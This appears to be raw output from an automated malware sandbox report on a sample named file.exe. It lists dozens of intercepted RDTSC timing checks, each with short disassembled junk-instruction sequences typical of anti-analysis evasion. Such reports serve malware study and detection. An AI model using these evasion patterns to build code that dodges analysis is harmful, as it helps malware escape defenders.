              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97FFC1 second address: 97FFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97FFCF second address: 97FFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97FFD3 second address: 97FFE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985053 second address: 985080 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F5A4CBCDC75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5A4CBCDC72h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9842AB second address: 9842AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9842AF second address: 9842C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F5A4CBCDC72h 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9842C9 second address: 9842D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984467 second address: 98446B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98446B second address: 984471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984471 second address: 984477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98472F second address: 984735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984880 second address: 984885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984885 second address: 98488A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984A05 second address: 984A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9891DF second address: 9891F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FAh 0x00000009 jng 00007F5A4D20A9F6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9891F6 second address: 989202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F5A4CBCDC66h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989202 second address: 98920C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98920C second address: 989210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989210 second address: 989216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9895F0 second address: 9895F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9895F8 second address: 989612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5A4D20A9F6h 0x0000000a popad 0x0000000b push edi 0x0000000c jmp 00007F5A4D20A9FDh 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989612 second address: 989625 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5A4CBCDC6Eh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989625 second address: 989654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5A4D20A9FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5A4D20AA05h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989654 second address: 98965A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98965A second address: 98966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007F5A4D20A9F6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989915 second address: 989948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F5A4CBCDC7Dh 0x0000000b jmp 00007F5A4CBCDC75h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F5A4CBCDC6Dh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989948 second address: 98995A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5A4D20AA06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934A3E second address: 934A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989AAE second address: 989AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A623 second address: 98A62A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DD63 second address: 98DD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990A6F second address: 990A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997C67 second address: 997C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997C6D second address: 997C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5A4CBCDC77h 0x0000000b popad 0x0000000c jng 00007F5A4CBCDC6Ch 0x00000012 jno 00007F5A4CBCDC66h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997C97 second address: 997CB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A4D20A9FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F5A4D20A9F6h 0x00000013 jno 00007F5A4D20A9F6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997CB8 second address: 997CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC70h 0x00000007 jmp 00007F5A4CBCDC6Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997CDD second address: 997CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997CE1 second address: 997CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995E6E second address: 995E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995E72 second address: 995E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC78h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F5A4CBCDC6Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995E9A second address: 995EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5A4D20A9F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995EA5 second address: 995EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996016 second address: 99602A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99602A second address: 99604A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F5A4CBCDC68h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5A4CBCDC71h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996C22 second address: 996C40 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5A4D20AA08h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99775F second address: 99776F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F5A4CBCDC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99776F second address: 997773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997773 second address: 997779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C597 second address: 99C5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C5A5 second address: 99C5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F5A4CBCDC73h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C5C0 second address: 99C5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007F5A4D20A9FAh 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F5A4D20A9F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A02C4 second address: 9A02D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F5A4CBCDC6Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A02D3 second address: 9A02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A02DD second address: 9A02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A02E1 second address: 9A02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F3C0 second address: 99F3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F3C4 second address: 99F3FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA05h 0x00000007 jmp 00007F5A4D20AA06h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F5A4D20A9F6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F3FD second address: 99F418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC71h 0x00000007 jnc 00007F5A4CBCDC66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F418 second address: 99F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F558 second address: 99F574 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A4CBCDC6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F5A4CBCDC66h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F5A4CBCDC6Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F574 second address: 99F578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F9E2 second address: 99F9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F9E6 second address: 99FA02 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F5A4D20A9FBh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA02 second address: 99FA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA0A second address: 99FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA04h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FCF6 second address: 99FCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FCFA second address: 99FD13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA00h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FE44 second address: 99FE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6E61 second address: 9A6E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6E72 second address: 9A6E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F5A4CBCDC74h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A7433 second address: 9A7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A4D20AA06h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A7F38 second address: 9A7F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8636 second address: 9A8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F5A4D20A9F6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5A4D20AA03h 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8664 second address: 9A8669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8669 second address: 9A8682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4D20AA05h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8682 second address: 9A86B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5A4CBCDC76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65E2 second address: 9A65F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5A4D20AA00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A65F8 second address: 9A6611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4CBCDC73h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF264 second address: 9AF26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF26A second address: 9AF285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F5A4CBCDC73h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF285 second address: 9AF28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEED6 second address: 9AEEEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AEEEF second address: 9AEEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA52 second address: 9BBA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A4CBCDC71h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA6A second address: 9BBA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF0D second address: 9BEF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F5A4CBCDC66h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE93C second address: 9BE962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5A4D20A9F6h 0x0000000a pushad 0x0000000b jmp 00007F5A4D20AA09h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEA92 second address: 9BEA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A52 second address: 9D1A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A58 second address: 9D1A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A5D second address: 9D1A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D74AB second address: 9D74B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5A4CBCDC66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D74B7 second address: 9D74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7AA8 second address: 9D7AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7BD0 second address: 9D7C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA03h 0x00000009 popad 0x0000000a jmp 00007F5A4D20A9FEh 0x0000000f jmp 00007F5A4D20AA09h 0x00000014 push ebx 0x00000015 js 00007F5A4D20A9F6h 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7C1E second address: 9D7C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85D1 second address: 9D85E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD048 second address: 9DD04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E880B second address: 9E882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F5A4D20AA33h 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F5A4D20A9F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
